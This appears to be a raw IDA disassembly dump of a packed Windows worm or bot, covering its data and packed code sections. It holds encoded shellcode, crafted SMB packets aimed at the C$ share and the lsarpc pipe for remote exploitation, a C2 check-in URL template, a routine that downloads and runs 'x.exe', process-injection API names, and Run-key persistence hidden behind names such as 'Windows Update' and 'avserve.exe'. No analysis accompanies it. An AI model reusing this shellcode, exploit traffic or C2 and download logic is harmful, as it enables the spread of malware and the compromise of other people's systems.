		dd 2E656E69h, 7572h, 656C6966h,	72616573h, 722E6863h, 75h
		dd 6F626F72h, 61686378h, 2E65676Eh, 6D6F63h, 68746566h
		dd 2E647261h, 7A6962h, 63657361h, 2E616B68h, 7572h, 7473616Dh
		dd 782D7265h, 6D6F632Eh, 0
		dd 6F6C6F63h, 61622D72h, 722E6B6Eh, 75h, 6B76616Bh, 742E7A61h
		dd 76h,	74757263h, 6E2E706Fh, 75h, 6F64696Bh, 61622D73h
		dd 722E6B6Eh, 75h, 65726170h, 61622D78h, 722E6B6Eh, 75h
		dd 6C756461h, 6D652D74h, 65726970h, 6D6F632Eh, 0
		dd 666E6F6Bh, 616B7369h, 726F2E74h, 67h, 69746963h, 6E61622Dh
		dd 75722E6Bh, 0
dword_314241D4	dd 72617778h, 6A632E65h, 656E2E62h, 74hdword_314241E4	dd 617A616Dh, 616B6166h, 75722Ehdword_314241F0	dd 6578652Eh, 0						; sub_3142207E+55o ...
dword_314241F8	dd 5Ch							; sub_31422A9B+56o
aMozilla4_0Comp	db 'Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)',0
					; DATA XREF: sub_314211A0+13o
		align 10h
aAbcdefghijkl_0	db 'abcdefghijklmnopqrstuvwxyz',0 ; DATA XREF: sub_31421316+1Co
		align 4
aAbcdefghijklmn	db 'ABCDEFGHIJKLMNOPQRSTUVWXYZ',0 ; DATA XREF: sub_31421316+Co
		align 4
aZer0		db 'zer0',0             ; DATA XREF: sub_31421422+34o
		align 10h
aHttpS		db 'http://%s',0        ; DATA XREF: sub_314215C7+71o
		align 4
aHttpSIndex_php	db 'http://%s/index.php?id=%s&scn=%d&inf=%d&ver=19&cnt=%s',0
					; DATA XREF: sub_314215C7+57o
		align 8
byte_314242B8	db 0EBh			; DATA XREF: sub_31421801+24Eo
					; sub_31421801+260o ...
		db 58h
word_314242BA	dw 7468h		; DATA XREF: sub_31422712+40o
		dd 2F3A7074h, 3732312Fh, 302E302Eh, 383A312Eh, 652F3030h
		dd 6578652Eh, 4	dup(0DFDFDFDFh), 7A6F4DDFh, 616C6C69h
		dd 302E342Fh, 0C9335DDFh, 1EEB966h, 8B05758Dh, 3C068AFEh
		dd 46057599h, 302C068Ah, 88993446h, 0EDE24707h,	0DAE80AEBh
		dd 2EFFFFFFh, 2E676562h, 0C9999371h, 0C999C999h, 91BDFD12h
		dd 0C99916FDh, 0AA6872C1h, 0AA66FD42h, 14BA10FDh, 9998A91Ch
		dd 0C9C999C9h, 98F198F3h, 9986C999h, 98C071C9h,	0C999C999h
		dd 37CB5F90h, 1C965992h, 99C99978h, 14C999C9h, 7D7157E4h
		dd 0C999C999h, 0E414C999h, 9945713Ah, 99C999C9h, 0F19DF3C9h
		dd 9989C999h, 0F1C999C9h, 0C999C999h, 0F3C9999Ch, 0B371C999h
		dd 99C99998h, 0E3F367C9h, 0DC1C10F0h, 99C99998h, 0C959B2C9h
		dd 0C99BF3C9h, 0C999F1C9h, 0C999C999h, 0A10414D9h, 99C99998h
		dd 9E71CAC9h, 99C99998h, 61688DC9h, 0AD1C1091h,	99C99998h
		dd 66611AC9h, 99111D96h, 99C999C9h, 0C850B2C9h,	98F3C8C8h
		dd 0C957DC14h, 0C9992571h, 0C999C999h, 91C0A44Eh, 59924912h
		dd 59B2F7EDh, 0C9C9C9C9h, 0CA3AC414h, 993B71CBh, 99C999C9h
		dd 0E424FFC9h, 0ED599221h, 0F1CDCDCFh, 0C999C999h, 66C9999Ch
		dd 9998DC2Ch, 0C9C999C9h, 0C9991E71h, 0C999C999h, 83B8B0FBh
		dd 5D12CDC3h, 0C9C999F3h, 0DC2C66CBh, 99C99998h, 0AD2C66C9h
		dd 99C99998h, 990B71C9h, 99C999C9h, 0A6485AC9h,	2C66C096h
		dd 0C99998ADh, 1B71C999h, 0C999C999h, 294CC999h, 9CF3EBA7h
		dd 98A10414h, 0C999C999h, 99E971CAh, 99C999C9h,	26F434C9h
		dd 0C999F371h, 0C999FC71h, 0C999C999h, 0EF133BF9h, 376B4629h
		dd 9966DE5Fh, 0A8EC5AC9h, 99C999A0h, 99C999C9h,	0B7C999C9h
		dd 0E9EDFFC5h, 0B7FDE9ECh, 99FCE1FCh, 6	dup(99C999C9h)
		dd 0FCF5CAC9h, 0C999E9FCh, 0F7EBFCF2h, 0ABAAF5FCh, 34C7C999h
		dd 0B459AAF9h, 662A2A25h, 9093ACC9h, 9CC9B781h,	83639D90h
		dd 9271CDC9h, 0C999C999h, 19BFC999h, 0FD145135h, 720A95BDh
		dd 0F934C791h, 0C999C871h, 0C999C999h, 12A5D212h, 9AE180D5h
		dd 146FAA52h, 0C89A2A8Dh, 9A8B12B9h, 5859AA4Ah,	9BAB9E59h
		dd 99A319DBh, 0A26CECC9h, 0ED85BDDDh, 0E8A2DF9Eh, 5544EB81h
		dd 9ABDC812h, 8D2E964Ah, 85D812EBh, 9D125A9Ah, 105A9A09h
		dd 0F885BDDDh, 98D01C10h, 0C999C999h, 7F664966h, 8712FEFDh
		dd 12C999A9h, 0C21295C2h, 12821285h, 0B75A91C2h, 0B7FDF7FCh
		dd 0
dword_31424580	dd 85000000h, 424D53FFh, 72h, 0C8531800h, 3 dup(0)
					; DATA XREF: sub_31421801+186o
		dd 0FEFF0000h, 0
		dd 2006200h
aPcNetworkProgr	db 'PC NETWORK PROGRAM 1.0',0
		db 2
		db  4Ch	; L
		db 41h,	4Eh, 4Dh
		db  41h	; A
		db 4Eh,	31h, 2Eh
		db  30h	; 0
		align 2
		dw 5702h
aIndowsForWorkg	db 'indows for Workgroups 3.1a',0
		db 2
		dd 2E314D4Ch, 30305832h, 4C020032h, 414D4E41h, 312E324Eh
		dd 544E0200h, 204D4C20h, 32312E30h, 0
dword_3142460C	dd 0A4000000h, 424D53FFh, 73h, 0C8071800h, 3 dup(0)
					; DATA XREF: sub_31421801+1BAo
		dd 0FEFF0000h, 100000h,	0A400FF0Ch, 0A110400h, 0
		dd 20000000h, 0
		dd 0D400h, 4E006980h, 534D4C54h, 1005053h, 97000000h, 0E00882h
		dd 4 dup(0)
aWindows2000219:
		unicode	0, <Windows 2000 2195>,0
aWindows20005_0:
		unicode	0, <Windows 2000 5.0>,0
		align 8
dword_314246B8	dd 0DA000000h, 424D53FFh, 73h, 0C8071800h, 3 dup(0)
					; DATA XREF: sub_31421801+1EEo
		dd 0FEFF0000h, 200800h,	0DA00FF0Ch, 0A110400h, 0
		dd 57000000h, 0
		dd 0D400h, 4E009F80h, 534D4C54h, 3005053h, 1000000h, 46000100h
		dd 0
		dd 47000000h, 0
		dd 40000000h, 0
		dd 40000000h, 6000000h,	40000600h, 10000000h, 47001000h
		dd 15000000h, 48E0888Ah, 44004F00h, 19810000h, 0E4F27A6Ah
		dd 0AF281C49h, 10742530h, 575367h, 6E0069h, 6F0064h, 730077h
		dd 320020h, 300030h, 200030h, 310032h, 350039h,	570000h
		dd 6E0069h, 6F0064h, 730077h, 320020h, 300030h,	200030h
		dd 2E0035h, 30h, 0
dword_31424798	dd 5C000000h, 424D53FFh, 75h, 0C8071800h, 3 dup(0)
					; DATA XREF: sub_31421801+8Do
		dd 0FEFF0000h, 300800h,	5C00FF04h, 1000800h, 3100h, 5C005Ch
		dd 390031h, 2E0032h, 360031h, 2E0038h, 2E0031h,	310032h
		dd 5C0030h, 500049h
aC:					; DATA XREF: sub_31421801+BFo
		unicode	0, <C$>,0
a?????		db '?????',0
		dd 0
dword_314247FC	dd 64000000h, 424D53FFh, 0A2h, 0C8071800h, 3 dup(0)
					; DATA XREF: sub_31421801+2D4o
		dd 4DC0800h, 400800h, 0DE00FF18h, 0E00DEh, 16h,	0
		dd 2019Fh, 3 dup(0)
		dd 3, 1, 40h, 2, 1103h,	6C005Ch, 610073h, 700072h, 63h
		dd 0
dword_31424868	dd 9C000000h, 424D53FFh, 25h, 0C8071800h, 3 dup(0)
					; DATA XREF: sub_31421801+308o
		dd 4DC0800h, 500800h, 48000010h, 0
		dd 4, 2	dup(0)
		dd 48005400h, 2005400h,	2600h, 10005940h, 50005Ch, 500049h
		dd 5C0045h, 0
		dd 30B0005h, 10h, 48h, 1, 10B810B8h, 0
		dd 1, 10000h, 3919286Ah, 11D0B10Ch, 0C000A89Bh,	0F52ED94Fh
		dd 0
		dd 8A885D04h, 11C91CEBh, 8E89Fh, 6048102Bh, 2, 0
dword_3142490C	dd 0F40C0000h, 424D53FFh, 25h, 0C8071800h, 3 dup(0)
					; DATA XREF: sub_31421801+4EEo
		dd 4DC0800h, 600800h, 0A0000010h, 0Ch, 4, 2 dup(0)
		dd 0A0005400h, 200540Ch, 2600h,	100CB140h, 50005Ch, 500049h
		dd 5C0045h, 0
		dd 3000005h, 10h, 0CA0h, 1, 0C88h, 90000h, 3ECh, 0
		dd 3ECh, 0
dword_3142498C	dd 401495h, 3, 40707Ch,	1, 0		dd 1, 0
		dd 1, 0
		dd 1, 0
		dd 1, 0
		dd 1, 0
		dd 1, 0
		dd 1, 0
		dd 40707Ch, 1, 0
		dd 1, 0
		dd 40707Ch, 1, 0
		dd 1, 0
		dd 40707Ch, 1, 0
		dd 1, 0
		dd 138578h, 0E9A65BABh,	0
dword_31424A20	dd 0F8100000h, 424D53FFh, 2Fh, 0C8071800h, 3 dup(0)
					; DATA XREF: sub_31421801+347o
		dd 0FEFF0800h, 600800h,	0DE00FF0Eh, 4000DEh, 0FF000000h
		dd 8FFFFFFh, 10B800h, 4010B800h, 0
		dd 0EE10B900h, 1000005h, 10h, 10B8h, 1,	200Ch, 90000h
		dd 0DADh, 0
		dd 0DADh, 0
dword_31424A8C	dd 0D80F0000h, 424D53FFh, 25h, 0C8071800h, 3 dup(0)
					; DATA XREF: sub_31421801+372o
		dd 1180800h, 700800h, 84000010h, 0Fh, 4, 2 dup(0)
		dd 84005400h, 200540Fh,	2600h, 0F9540h,	50005Ch, 500049h
		dd 5C0045h, 0
		dd 2000005h, 10h, 0F84h, 1, 0F6Ch, 90000h, 0
dword_31424B00	dd 0				dd 40A89Ah, 1, 0
		dd 1, 0
		dd 1, 0
		dd 1, 0
		dd 1, 0
		dd 1, 0
		dd 1, 0
		dd 1, 0
		dd 40A89Ah, 1, 0
		dd 1, 0
		dd 40A89Ah, 1, 0
		dd 1, 0
		dd 40A89Ah, 1, 0
		dd 1, 3	dup(0)
		dd 586E6957h, 72502050h, 6Fh, 9	dup(0)
		db 2 dup(0)
dword_31424BBE	dd 1004600h			dw 1
		dd 69570000h, 206B326Eh, 6F7250h, 0Ah dup(0)
dword_31424BF8	dd 7515123Ch, 2, 326E6957h, 5341206Bh, 0Ah dup(0)
					; DATA XREF: sub_31421801+41Bo
					; sub_31421801+45Do
		dd 123C0000h, 751Ch, 0Eh dup(0)
; ---------------------------------------------------------------------------


loc_31424C70:				; DATA XREF: sub_31421801+44Ao
		jmp	short loc_31424C78
; ---------------------------------------------------------------------------
		jmp	short loc_31424C7A
; ---------------------------------------------------------------------------
		align 8


loc_31424C78:				; CODE XREF: UPX0:loc_31424C70j
					; DATA XREF: sub_31421801+5Co
		pop	esp
		pop	esp


loc_31424C7A:				; CODE XREF: UPX0:31424C72j
		and	eax, 70695C73h
		arpl	[eax+eax], sp
; ---------------------------------------------------------------------------
		dw 0
dword_31424C84	dd 1CEC8166h	dword_31424C88	dd 0E4FF07h	aSedebugprivile	db 'SeDebugPrivilege',0 ; DATA XREF: sub_31421D68+62o
		align 10h
aAdjusttokenpri	db 'AdjustTokenPrivileges',0 ; DATA XREF: sub_31421D68+39o
		align 4
aLookupprivileg	db 'LookupPrivilegeValueA',0 ; DATA XREF: sub_31421D68+2Ao
		align 10h
aOpenprocesstok	db 'OpenProcessToken',0 ; DATA XREF: sub_31421D68+1Bo
		align 4
aAdvapi32	db 'advapi32',0         ; DATA XREF: sub_31421D68+8o
					; sub_314223B2+12Co
		align 10h
aUterm19	db 'uterm19',0          ; DATA XREF: sub_31421DF0:loc_31421ED5o
					; UPX0:31422351o ...
aShell_traywnd	db 'Shell_TrayWnd',0    ; DATA XREF: sub_31421DF0+58o
		align 4
aCreateremoteth	db 'CreateRemoteThread',0 ; DATA XREF: sub_31421DF0:loc_31421E37o
		align 4
aVirtualallocex	db 'VirtualAllocEx',0   ; DATA XREF: sub_31421DF0+34o
		align 4
aKernel32	db 'kernel32',0         ; DATA XREF: sub_31421DF0+18o
		align 4
dword_31424D38	dd 0E9F3F5h	aHttp1_1200Ok	db 'HTTP/1.1 200 OK',0Dh,0Ah ; DATA XREF: sub_3142207E+106o
		db 0Dh,0Ah
		db 0Dh,0Ah,0
		align 4
aContentLengthU	db 'Content-Length: %u',0Dh,0Ah ; DATA XREF: sub_3142207E+85o
		db 0Dh,0Ah,0
		align 4
aHttp1_1200OkCo	db 'HTTP/1.1 200 OK',0Dh,0Ah ; DATA XREF: sub_3142207E+71o
		db 'Content-Type: application/x-exe-compressed',0Dh,0Ah,0
		align 4
aGet		db 'GET',0              ; DATA XREF: sub_3142207E+3Do
aFtpupd_exe	db 'ftpupd.exe',0       ; DATA XREF: UPX0:3142233Co
		align 4
aUser32		db 'user32',0           ; DATA XREF: sub_314223B2+133o
		align 4
aMsvcrt		db 'msvcrt',0           ; DATA XREF: sub_314223B2+125o
		align 4
aWininet	db 'wininet',0          ; DATA XREF: sub_314223B2+11Eo
aWs2_32		db 'ws2_32',0           ; DATA XREF: sub_314223B2+111o
		align 4
aU19x		db 'u19x',0             ; DATA XREF: sub_314223B2+BDo
		align 4
aU19		db 'u19',0              ; DATA XREF: sub_314223B2+B6o
aU18		db 'u18',0              ; DATA XREF: sub_314223B2+AFo
aU17		db 'u17',0              ; DATA XREF: sub_314223B2+A8o
aU16		db 'u16',0              ; DATA XREF: sub_314223B2+A1o
aU15		db 'u15',0              ; DATA XREF: sub_314223B2+9Ao
aU14		db 'u14',0              ; DATA XREF: sub_314223B2+93o
aU13i		db 'u13i',0             ; DATA XREF: sub_314223B2+8Co
		align 4
aU13		db 'u13',0              ; DATA XREF: sub_314223B2+85o
aU12		db 'u12',0              ; DATA XREF: sub_314223B2+7Eo
aU11		db 'u11',0              ; DATA XREF: sub_314223B2+77o
aU10		db 'u10',0              ; DATA XREF: sub_314223B2+70o
aU9		db 'u9',0               ; DATA XREF: sub_314223B2+69o
		align 4
aU8		db 'u8',0               ; DATA XREF: sub_314223B2+62o
		align 4
aU18x		db 'u18x',0             ; DATA XREF: sub_314223B2+5Bo
		align 4
aU17x		db 'u17x',0             ; DATA XREF: sub_314223B2+54o
		align 4
aU16x		db 'u16x',0             ; DATA XREF: sub_314223B2+4Do
		align 4
aU15x		db 'u15x',0             ; DATA XREF: sub_314223B2+46o
		align 4
aU14x		db 'u14x',0             ; DATA XREF: sub_314223B2+3Fo
		align 4
aU13x		db 'u13x',0             ; DATA XREF: sub_314223B2+38o
		align 4
aU12x		db 'u12x',0             ; DATA XREF: sub_314223B2+31o
		align 4
aU11x		db 'u11x',0             ; DATA XREF: sub_314223B2+2Ao
		align 4
aU10x		db 'u10x',0             ; DATA XREF: sub_314223B2+23o
		align 4
aHttpSDX_exe	db 'http://%s:%d/x.exe',0 ; DATA XREF: sub_31422712+2Do
		align 4
aSoftwareMicros	db 'SOFTWARE\Microsoft\Windows\CurrentVersion\Run',0
					; DATA XREF: sub_314221C4+23o
					; sub_314229E6+66o ...
		align 4
aCryptographicS	db 'Cryptographic Service',0 ; DATA XREF: sub_314221C4+1Co
					; sub_31422A9B+87o ...
		align 10h
aFgnsdrjyrsert	db 'fgnsdrjyrsert',0    ; DATA XREF: sub_314215C7+4Fo
					; sub_31422B67+57o ...
		align 10h
		dd 2 dup(0)
aSoftwareMicr_0	db 'Software\Microsoft\Wireless',0 ; DATA XREF: sub_31422B67+32o
aClient		db 'Client',0           ; DATA XREF: sub_31422B67+BCo
					; sub_31422B67+F8o
		align 4
aId		db 'ID',0               ; DATA XREF: sub_31422B67+37o
					; sub_31422B67+75o
		align 10h
aWindowsUpdate	db 'Windows Update',0   ; DATA XREF: sub_314229E6+55o
		align 10h
aMsConfigV13	db 'MS Config v13',0    ; DATA XREF: sub_314229E6+4Eo
		align 10h
aAvserve2_exeup	db 'avserve2.exeUpdate Service',0 ; DATA XREF: sub_314229E6+47o
		align 4
aAvserve_exe	db 'avserve.exe',0      ; DATA XREF: sub_314229E6+40o
aWindowsUpdateS	db 'Windows Update Service',0 ; DATA XREF: sub_314229E6+39o
		align 10h
aWinupdate	db 'WinUpdate',0        ; DATA XREF: sub_314229E6+32o
		align 4
aSystray	db 'SysTray',0          ; DATA XREF: sub_314229E6+2Bo
aBotLoader	db 'Bot Loader',0       ; DATA XREF: sub_314229E6+24o
		align 10h
aSystemRestoreS	db 'System Restore Service',0 ; DATA XREF: sub_314229E6+1Do
		align 4
aDiskDefragment	db 'Disk Defragmenter',0 ; DATA XREF: sub_314229E6+16o
		align 4
aWindowsSecurit	db 'Windows Security Manager',0 ; DATA XREF: sub_314229E6+Fo
		align 4
a1:					; DATA XREF: sub_31422B67+B7o
		unicode	0, <1>,0
		dd 7 dup(0)
dword_31424FE8	dd 0							; sub_314221C4+80w
dword_31424FEC	dd 0							; sub_314216A2+53o ...
dword_31424FF0	dd 0							; sub_3142207E:loc_3142212Cr ...
dword_31424FF4	dd 0							; UPX0:3142235Cw ...
dword_31424FF8	dd 0							; sub_314223B2+CEw
dword_31424FFC	dd 0							; sub_31422712+20r
dword_31425000	dd 31420000h						; UPX0:31422341w
dword_31425004	dd 0							; sub_314216A2+4Ao ...
dword_31425008	dd 0							; UPX0:314227C1w
word_3142500C	dw 0			; DATA XREF: sub_3142255F+3Br
					; sub_314225C3:loc_31422624r ...
		align 10h
dword_31425010	dd 0							; sub_31422B67+110w
		align 1000h
UPX0		ends

; Section 2. (virtual address 00006000)
; Virtual size			: 00002000 (   8192.)
; Section size in file		: 00002000 (   8192.)
; Offset to raw	data for section: 00006000
; Flags	E0000060: Text Data Executable Readable	Writable
; Alignment	: default
; ===========================================================================

; Segment type:	Pure code
; Segment permissions: Read/Write/Execute
UPX1		segment	para public 'CODE' use32
		assume cs:UPX1
		;org 31426000h
		assume es:nothing, ss:nothing, ds:UPX0,	fs:nothing, gs:nothing
dword_31426000	dd 0C4h, 40h, 72695601h, 6C617574h, 65657246h, 69560100h
					; DATA XREF: UPX1:31427BB1o
		dd 61757472h, 6C6C416Ch, 100636Fh, 4D746547h, 6C75646Fh
		dd 6C694665h, 6D614E65h, 1004165h, 7274736Ch, 69706D63h
		dd 43010041h, 4679706Fh, 41656C69h, 69570100h, 6578456Eh
		dd 43010063h, 74616572h, 6F6F5465h, 6C65686Ch, 53323370h
		dd 7370616Eh, 746F68h, 6F725001h, 73736563h, 69463233h
		dd 747372h, 72655401h, 616E696Dh, 72506574h, 7365636Fh
		dd 50010073h, 65636F72h, 32337373h, 7478654Eh, 736C0100h
		dd 70637274h, 1004179h,	61657243h, 76456574h, 41746E65h
		dd 61570100h, 6F467469h, 6E695372h, 4F656C67h, 63656A62h
		dd 44010074h, 74656C65h, 6C694665h, 1004165h, 74697257h
		dd 6C694665h, 43010065h, 65736F6Ch, 646E6148h, 100656Ch
		dd 61657243h, 69466574h, 41656Ch, 74736C01h, 6E656C72h
		dd 6C010041h, 63727473h, 417461h, 74654701h, 74737953h
		dd 69446D65h, 74636572h, 4179726Fh, 65470100h, 636F4C74h
		dd 49656C61h, 416F666Eh, 6C530100h, 706565h, 746E4901h
		dd 6F6C7265h, 64656B63h, 68637845h, 65676E61h, 736C0100h
		dd 70637274h, 416E79h, 74654701h, 72727543h, 50746E65h
		dd 65636F72h, 1007373h,	50746547h, 41636F72h, 65726464h
		dd 1007373h, 64616F4Ch,	7262694Ch, 41797261h, 72570100h
		dd 50657469h, 65636F72h, 654D7373h, 79726F6Dh, 704F0100h
		dd 72506E65h, 7365636Fh, 47010073h, 6F4D7465h, 656C7564h
		dd 646E6148h, 41656Ch, 74654701h, 6B636954h, 6E756F43h
		dd 43010074h, 74616572h, 74754D65h, 417865h, 65724301h
		dd 54657461h, 61657268h, 43010064h, 74616572h, 6F725065h
		dd 73736563h, 53010041h, 76457465h, 746E65h, 65704F01h
		dd 6576456Eh, 41746Eh, 69784501h, 72685474h, 646165h, 746E4901h
		dd 6F6C7265h, 64656B63h, 72636E49h, 6E656D65h, 52010074h
		dd 46646165h, 656C69h, 74654701h, 656C6946h, 657A6953h
		dd 78450100h, 72507469h, 7365636Fh, 47010073h, 614C7465h
		dd 72457473h, 726F72h, 0D100h, 0
		dd 65520100h, 65724367h, 4B657461h, 78457965h, 52010041h
		dd 65536765h, 6C615674h, 78456575h, 52010041h, 75516765h
		dd 56797265h, 65756C61h, 417845h, 67655201h, 6E65704Fh
		dd 4579654Bh, 1004178h,	44676552h, 74656C65h, 6C615665h
		dd 416575h, 67655201h, 736F6C43h, 79654B65h, 62410100h
		dd 5374726Fh, 65747379h, 7568536Dh, 776F6474h, 100416Eh
		dd 70797243h, 65724374h, 48657461h, 687361h, 79724301h
		dd 61487470h, 61446873h, 1006174h, 70797243h, 72655674h
		dd 53796669h, 616E6769h, 65727574h, 43010041h, 74707972h
		dd 74736544h, 48796F72h, 687361h, 79724301h, 65447470h
		dd 6F727473h, 79654B79h, 72430100h, 52747079h, 61656C65h
		dd 6F436573h, 7865746Eh, 43010074h, 74707972h, 75716341h
		dd 43657269h, 65746E6Fh, 417478h, 79724301h, 6D497470h
		dd 74726F70h, 79654Bh, 0DE00h, 0EC00h, 72730100h, 646E61h
		dd 6D656D01h, 797063h, 72747301h, 6E656Ch, 6D656D01h, 746573h
		dd 6E617201h, 5F010064h, 65637865h, 685F7470h, 6C646E61h
		dd 337265h, 72747301h, 727473h,	72747301h, 726863h, 0E900h
		dd 11000h, 69460100h, 6957646Eh, 776F646Eh, 47010041h
		dd 6F467465h, 72676572h, 646E756Fh, 646E6957h, 100776Fh
		dd 57746547h, 6F646E69h, 72685477h, 50646165h, 65636F72h
		dd 64497373h, 73770100h, 6E697270h, 416674h, 0F400h, 12400h
		dd 6E490100h, 6E726574h, 704F7465h, 72556E65h, 100416Ch
		dd 65746E49h, 74656E72h, 6E65704Fh, 49010041h, 7265746Eh
		dd 4374656Eh, 65736F6Ch, 646E6148h, 100656Ch, 65746E49h
		dd 74656E72h, 43746547h, 656E6E6Fh, 64657463h, 74617453h
		dd 49010065h, 7265746Eh, 5274656Eh, 46646165h, 656C69h
		dd 10000h, 13C00h, 73FF00h, 0FF0002FFh,	1FF000Dh, 39FF00h
		dd 0FF006FFFh, 17FF0034h, 0CFF00h, 0FF0009FFh, 13FF0004h
		dd 10FF00h, 0FF0016FFh,	3, 50000000h, 4C000045h, 0C8000201h
		dd 40D859h, 0
		dd 0E0000000h, 0B010F00h, 601h,	26h, 12h, 34000000h, 23h
		dd 10h,	40h, 314200h, 10h, 4000002h, 0
		dd 4000000h, 2 dup(0)
		dd 60h,	4, 2000000h, 0
		dd 1000h, 10h, 1000h, 10h, 10000000h, 2	dup(0)
		dd 34000000h, 8C00002Dh, 15h dup(0)
		dd 7C000010h, 1, 5 dup(0)
		dd 2E000000h, 74786574h, 56000000h, 24h, 10h, 26h, 4, 2	dup(0)
		dd 20000000h, 2EE00400h, 61746164h, 14000000h, 10h, 40h
		dd 10h,	2Ah, 2 dup(0)
		dd 40000000h, 0C00000h,	3C000050h, 0C300002Fh, 0A1000054h
		dd 89254BBEh, 0DB43AA85h, 0AEF070A0h, 92A2047Dh, 4EC00F3Ch
		dd 27BE81Ch, 8402F26Ah,	47FC7D1Bh, 0F0024A19h, 0A033E402h
		dd 2164868h, 0D2B735D7h, 0A73D7D03h, 769F6801h,	36E6CCE6h
		dd 3A4A2064h, 1B5AB7CCh, 0DC87B734h, 6A7684E0h,	96F42A70h
		dd 0E6C8E38Ch, 5EC86080h, 7A97640Ah, 273E1B25h,	0A2280084h
		dd 364B003Fh, 3CD9B96Bh, 98B9B26Ch, 0E477BDE2h,	0DC016754h
		dd 317E500Fh, 0C777C3E4h, 0AC683B0Dh, 0D328C00Dh, 0B138CEDCh
		dd 0E56F08C9h, 0DB0C7A04h, 0D2484522h, 0DD2DC5F8h, 0D61B212Fh
		dd 402EDB1Ch, 67012DEh,	4C9039ECh, 40BCF844h, 0C27190D6h
		dd 1BDE5044h, 593B1E10h, 94B7336Fh, 8121970Dh, 67E9ACF9h
		dd 0E87CFEEBh, 1624A580h, 68250600h, 259D1C52h,	1CF25B07h
		dd 96F41276h, 899DE9C3h, 940AEF65h, 7BC87C6Ah, 64B1E3C3h
		dd 0C9BE490Ch, 991DD97Bh, 90E154E4h, 8C9FE924h,	0DCCCC349h
		dd 0CF78242Eh, 2C8248EDh, 0F864052Ch, 66F4150Ch, 3319A002h
		dd 8707A23h, 8F895E74h,	0F4C6DD0Eh, 1C51CC5Fh, 80B3EF9Ch
		dd 7F24E4A1h, 5A435A8h,	0B5D0781Bh, 571282F8h, 5A745737h
		dd 0ACBF931h, 74F80E14h, 9A0684Bh, 0CA28B753h, 2D3D74CEh
		dd 67ED85C9h, 0A0412069h, 0FFC55FFh, 35BAB9E8h,	50E49ED7h
		dd 0E9628ACh, 5B3002F0h, 5547BF4Dh, 8C0009F8h, 681583E4h
		dd 0F475583Bh, 1887EE42h, 851321C5h, 0A90A508Bh, 0BFF77FB6h
		dd 3C418B2Fh, 68C10357h, 488B4D2Ch, 50788B34h, 0A0F44D89h
		dd 0EE062AB4h, 1C68D84Bh, 5D97D81Bh, 0F0F559AAh, 868D201h
		dd 0C18DEC12h, 0ED74C3B1h, 1110D70Dh, 0F46F0E82h, 1409B26Ah
		dd 0F84DF123h, 91762C51h, 18185085h, 892A6897h,	6C54A0E9h
		dd 0CA405DB0h, 46C0ED03h, 0EB346B63h, 9AAB1930h, 596ED578h
		dd 37DF055h, 0AB6745E6h, 0F03EDD4Bh, 53503151h,	9E0AC1Eh
		dd 0F435C4F7h, 17FAD6BDh, 3FEA6D6Ah, 5577D0F1h,	74C73BECh
		dd 1BEB5805h, 5AE57E17h, 25348CBFh, 5FC0E59h, 36E7345Fh
		dd 740807EBh, 0E1FC58EFh, 5F521E86h, 602F5151h,	0B269310Fh
		dd 5C91A144h, 0BAB8250Dh, 0DD20DB42h, 0B213B1AFh, 1133AEECh
		dd 2D590FEBh, 0B66AF9C2h, 99EDC4B1h, 0C803CBCh,	1450A850h
		dd 7D2774D6h, 5DC02C50h, 4459FC19h, 437C20BAh, 247C8B57h
		dd 0A5C58314h, 7E11D25Ah, 641A8717h, 803FFFF5h,	148861C2h
		dd 0F73B461Eh, 2480E97Ch, 0C68C003Bh, 54D5D6DBh, 5F2E448Bh
		dd 5657AC5Ah, 30181DDBh, 2F216674h, 8896DC73h, 50F02EEDh
		dd 565019h, 3C3ACAAh, 9577E134h, 49F44DC4h, 8F6B6E8Ch
		dd 0F00CFA68h, 0C908C7FFh, 349B6996h, 2E2ACC34h, 99AD734Ch
		dd 0A0A75EDh, 1A20BC50h, 3E160118h, 7C654A1h, 13B7FB8h
		dd 0ADF1CE74h, 8B0C407Dh, 51080100h, 5F24448Dh,	9B613421h
		dd 0D31130C5h, 74245903h, 7F84EE8h, 7BBCC15h, 662FC820h
		dd 3333C7FBh, 0C1F8C8E4h, 0B8510E7h, 4679B0D4h,	8B0200B6h
		dd 33125Dh, 0F3702647h,	19DC201h, 53C4EAC9h, 0A311E3C6h
		dd 0F2B57B35h, 0C3255035h, 26B69D83h, 0ADE74880h, 40666CB5h
		dd 41F0179Eh, 0BB683595h, 98CEE331h, 0B76C683Dh, 474FF044h
		dd 19B1606Ch, 0A54D54FEh, 2CC5D314h, 7C54DADCh,	0FC0DFE00h
		dd 33A134BAh, 2B7900B9h, 72C13BC7h, 72C18B02h, 0E1EBB76Fh
		dd 0E8A1292Bh, 23C70318h, 0FE25A3ACh, 233DCC96h, 786A1172h
		dd 0DA3140F8h, 0C4EB3C28h, 7750E113h, 6CF64F26h, 941ED411h
		dd 0CD3C6815h, 0BEE4D62h, 97386803h, 9D663E3Ch,	54533AB5h
		dd 0D0835253h, 8C47E0B1h, 4C29824h, 136D8223h, 0E643098h
		dd 0E8D0B1F7h, 8C316D4h, 0BBEE4E29h, 89574377h,	80686806h
		dd 27841D89h, 5D4F7E18h, 14EC6DA2h, 0F2D4C0h, 0C1345391h
		dd 27B6B6Ch, 80EB3A01h,	9AD468E6h, 1A4DFD77h, 0B34A3678h
		dd 0DCCD2F74h, 677A5EA3h, 0A3650C75h, 53FCA4FEh, 1AD9D251h
		dd 3A865613h, 0DC3E68D8h, 2656D88Ch, 58195EF9h,	0F8DA6A12h
		dd 5E0510C2h, 0EF4B56C0h, 0C6697A4h, 0EC5D89E8h, 0DFFF050Dh
		dd 25EDF760h, 3A041FFFh, 43FCA3C3h, 8A1FE774h, 5FC984CCh
		dd 74E849BDh, 0EA6B50DFh, 64405F42h, 0A51985BAh, 440C6465h
		dd 2BE9AFA3h, 14F85F7Bh, 9E481FD8h, 0FACEADECh,	15207E68h
		dd 0E2EB624Eh, 5CC1CF53h, 455FE142h, 0AC019043h, 70661D7Bh
		dd 0B0333CAEh, 0D30711D6h, 23EDB43h, 803AD6E6h,	9B0D0AF9h
		dd 0ABB068B4h, 74E063A3h, 822B01D8h, 0F4A37B7Ch, 8609D9FBh
		dd 0B73DE4CDh, 29E04552h, 0EECDF670h, 1904640Dh, 68631BE2h
		dd 0EC1323B2h, 5C344FB5h, 1386EB13h, 0B06099AEh, 3569FB1Ah
		dd 397044F8h, 90252C40h, 0D2908F93h, 70CDC864h,	90458C13h
		dd 9406EF5Ch, 72391C54h, 9C4C98E4h, 0A43CA044h,	47239134h
		dd 0AC2CA88Eh, 391CB024h, 0B4C8E472h, 0BC14B818h, 9F0CC010h
